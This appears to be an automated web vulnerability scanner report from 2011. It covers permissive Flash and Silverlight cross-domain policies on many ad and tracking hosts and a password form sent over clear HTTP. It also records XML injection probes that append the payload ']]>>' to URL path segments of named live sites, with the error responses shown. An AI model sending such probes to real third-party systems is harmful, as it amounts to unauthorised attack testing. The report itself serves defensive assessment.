Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: 4.bp.blogspot.com
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ajax.googleapis.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: analytic.hotelclub.com
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:09:52 GMT Server: Omniture DC/2.0.0 xserver: www379 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ar.voicefive.com
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 24 Apr 2011 12:09:49 GMT Content-Type: text/xml Connection: close Vary: Accept-Encoding Accept-Ranges: bytes Content-Length: 230 Vary: Accept-Encoding,User-Agent P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: b.scorecardresearch.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: b.voicefive.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: bh.contextweb.com
Response
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 ETag: W/"384-1279190954000" Last-Modified: Thu, 15 Jul 2010 10:49:14 GMT Content-Type: application/xml Content-Length: 384 Date: Sun, 24 Apr 2011 12:33:50 GMT Connection: Keep-Alive P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.contxtweb.com --> <cross-domain-policy> <site-contro ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: bp.specificclick.net
Response
HTTP/1.1 200 OK Server: WebStar 1.0 Content-Type: text/xml Content-Length: 194 Date: Sun, 24 Apr 2011 03:16:36 GMT Connection: close
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ctix8.cheaptickets.com
Response
HTTP/1.1 200 OK Content-Length: 82 Content-Type: text/xml Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT Accept-Ranges: bytes ETag: "ef9fe45d4643c81:90b" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sun, 24 Apr 2011 12:09:47 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: data.coremetrics.com
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 03:13:17 GMT Server: Apache P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA" Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT ETag: "342dd0-c7-4758765f" Accept-Ranges: bytes Content-Length: 199 Keep-Alive: timeout=300, max=805 Connection: Keep-Alive Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ec.atdmt.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Content-Length: 207 Allow: GET Age: 486563 Date: Sun, 24 Apr 2011 12:29:09 GMT Expires: Mon, 25 Apr 2011 21:19:46 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: event.adxpose.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: exch.quantserve.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: fls.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ib.adnxs.com
Response
HTTP/1.0 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 03:13:18 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/xml
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only" ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: img1.wsimg.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT ETag: "05c981fc435c81:da7" Server: Microsoft-IIS/6.0 Cache-Control: max-age=3888000 Date: Sun, 24 Apr 2011 12:42:06 GMT Content-Length: 203 Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: img3.wsimg.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT ETag: "05c981fc435c81:da7" Server: Microsoft-IIS/6.0 Cache-Control: max-age=3888000 Date: Sun, 24 Apr 2011 12:42:04 GMT Content-Length: 203 Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: m.adnxs.com
Response
HTTP/1.0 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 12:31:04 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/xml
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only" ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: media.fastclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: roia.biz
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 24 Apr 2011 03:22:22 GMT Content-Type: text/x-cross-domain-policy Content-Length: 175 Last-Modified: Tue, 25 Nov 2008 04:11:55 GMT Connection: close Accept-Ranges: bytes
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: spe.atdmt.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Content-Length: 207 Allow: GET Expires: Sun, 01 May 2011 11:58:17 GMT Date: Sun, 24 Apr 2011 12:09:49 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: switch.atdmt.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: tracking.keywordmax.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.dictof.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: googleads.g.doubleclick.net
Response
HTTP/1.0 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/x-cross-domain-policy; charset=UTF-8 Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Sat, 23 Apr 2011 21:20:00 GMT Expires: Sun, 24 Apr 2011 21:20:00 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 21200 Cache-Control: public, max-age=86400
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: i35.tinypic.com
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:44:44 GMT Content-Length: 916 Content-Type: text/xml ETag: "394-39350380" Last-Modified: Fri, 17 Apr 2009 13:33:18 GMT Accept-Ranges: bytes Server: Apache X-Cache: MISS from tinypic.com Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: pagead2.googlesyndication.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: partners.nextadnetwork.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.apmebf.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.kqzyfj.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.securepaynet.net
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/xml; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" Date: Sun, 24 Apr 2011 12:43:21 GMT Connection: close Content-Length: 155
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
The application publishes a Flash cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: media.compete.com
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Tue, 29 Mar 2011 18:08:23 GMT ETag: "b8c48-20c-f226f3c0" Accept-Ranges: bytes Content-Length: 524 Content-Type: application/xml; charset=utf-8 Date: Sun, 24 Apr 2011 12:45:09 GMT Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="all"/>
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.doubleclick.net
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: analytic.hotelclub.com
Response
HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 12:09:52 GMT Server: Omniture DC/2.0.0 xserver: www121 Connection: close Content-Type: text/html
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.scorecardresearch.com
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.voicefive.com
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: clk.atdmt.com
Response
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/xml Last-Modified: Fri, 28 Mar 2008 17:48:18 GMT Accept-Ranges: bytes ETag: "9e243e8fb90c81:0" Date: Sun, 24 Apr 2011 12:33:04 GMT Connection: close Content-Length: 312
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ec.atdmt.com
Response
HTTP/1.0 200 OK Expires: Sun, 01 May 2011 12:29:09 GMT Date: Sun, 24 Apr 2011 12:29:09 GMT Content-Type: text/xml Content-Length: 312 Allow: GET Connection: close
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: s0.2mdn.net
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: spe.atdmt.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Content-Length: 312 Allow: GET Expires: Tue, 26 Apr 2011 00:56:06 GMT Date: Sun, 24 Apr 2011 12:09:49 GMT Connection: close
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: switch.atdmt.com
Response
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/xml Last-Modified: Fri, 28 Mar 2008 17:48:18 GMT Accept-Ranges: bytes ETag: "9e243e8fb90c81:0" Date: Sun, 24 Apr 2011 03:16:37 GMT Connection: close Content-Length: 312
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ts1.mm.bing.net
Response
HTTP/1.0 200 OK Content-Length: 1766 Content-Type: text/xml Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT Date: Sun, 24 Apr 2011 12:43:14 GMT Connection: close Cache-Control: public, max-age=3600
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ts2.mm.bing.net
Response
HTTP/1.0 200 OK Content-Length: 1766 Content-Type: text/xml Last-Modified: Tue, 14 Dec 2010 01:03:25 GMT Date: Sun, 24 Apr 2011 12:43:32 GMT Connection: close Cache-Control: public, max-age=3600
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.dictof.com/login/
The form contains the following password field:
password
Issue background
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
Request
GET / HTTP/1.1 Host: www.dictof.com Proxy-Connection: keep-alive Referer: http://kroogy.com/pub/banner_728_90_random.php User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.
This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /bluepixel]]>>/cnt-gif1x1.php?e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page HTTP/1.1 Host: 2byto.com Proxy-Connection: keep-alive Referer: http://www.dictof.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /bluepixel/cnt-gif1x1.php]]>>?e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page HTTP/1.1 Host: 2byto.com Proxy-Connection: keep-alive Referer: http://www.dictof.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
<?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images]]>>/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg</Key> ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
<?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images/1311756]]>>/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg</Key> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
<?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg]]>></Key> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adserver]]>>/www/delivery/tjs.php?trackerid=276&append=1&r=96277 HTTP/1.1 Host: delivery.ctasnet.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=2182862;type=websi010;cat=homep146;ord=1;num=8709666307549.924? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sun, 24 Apr 2011 12:10:28 GMT Server: lighttpd/1.4.26 Connection: close
